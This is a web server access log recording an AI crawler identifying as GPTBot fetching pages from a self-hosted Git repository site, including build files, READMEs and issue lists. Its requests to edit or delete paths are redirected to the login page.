"/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3?follow_symlink=1" [Client 74.7.227.38] [Length 11062] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" +[17/Feb/2026:17:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10949] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/TestApp" +[17/Feb/2026:17:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10948] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/TestApp" +[17/Feb/2026:17:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/TestApp?display=rendered" [Client 74.7.227.38] [Length 10947] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/TestApp" +[17/Feb/2026:17:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16204] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:13:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16207] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/Makefile?display=source" [Client 74.7.227.38] [Length 16203] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:13:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/appsettings.Development.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/TestService/appsettings.Development.json" +[17/Feb/2026:17:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/TestService/appsettings.Development.json" +[17/Feb/2026:17:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 10054] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build" +[17/Feb/2026:17:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log?display=rendered" [Client 74.7.227.38] [Length 11178] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_error.log" +[17/Feb/2026:17:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log?display=rendered" [Client 74.7.227.38] [Length 11229] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:17:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log?display=source" [Client 74.7.227.38] [Length 12419] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log" +[17/Feb/2026:17:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/Makefile" +[17/Feb/2026:17:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 15993] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:17:13:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild" [Client 74.7.227.38] [Length 51709] [Gzip 9.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build" +[17/Feb/2026:17:13:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 29900] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:17:13:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 29904] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:17:13:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 29901] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:17:13:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 29898] [Gzip 12.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:17:13:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9958] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:13:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 10120] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:13:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10308] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:13:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10689] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:13:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1" +[17/Feb/2026:17:13:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/README.md" +[17/Feb/2026:17:13:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/README.md" +[17/Feb/2026:17:13:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 21843] [Gzip 12.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/README.md" +[17/Feb/2026:17:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/README.md?display=rendered" [Client 74.7.227.38] [Length 16006] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/README.md" +[17/Feb/2026:17:13:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 6721] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/README.md" +[17/Feb/2026:17:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 981] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/README.md" +[17/Feb/2026:17:14:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&state=open&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" +[17/Feb/2026:17:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api" +[17/Feb/2026:17:14:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake" +[17/Feb/2026:17:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:14:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14336] [Gzip 5.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:17:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:17:14:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 10012] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:14:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/README.md" +[17/Feb/2026:17:14:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/README.md" +[17/Feb/2026:17:14:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/README.md" +[17/Feb/2026:17:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/README.md" +[17/Feb/2026:17:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11353] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:14:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&state=open&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls" +[17/Feb/2026:17:14:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&state=all&type=all" [Client 74.7.227.38] [Length 10146] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&state=open&type=all" +[17/Feb/2026:17:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api" [Client 74.7.227.38] [Length 9936] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api" +[17/Feb/2026:17:14:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake" [Client 74.7.227.38] [Length 10098] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake" +[17/Feb/2026:17:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10284] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:17:14:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 2092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:17:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:17:14:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query" +[17/Feb/2026:17:14:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" [Client 74.7.227.38] [Length 14611] [Gzip 9.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/index-2026-01-06T00-34-47-0208.json" +[17/Feb/2026:17:14:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10676] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:17:14:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 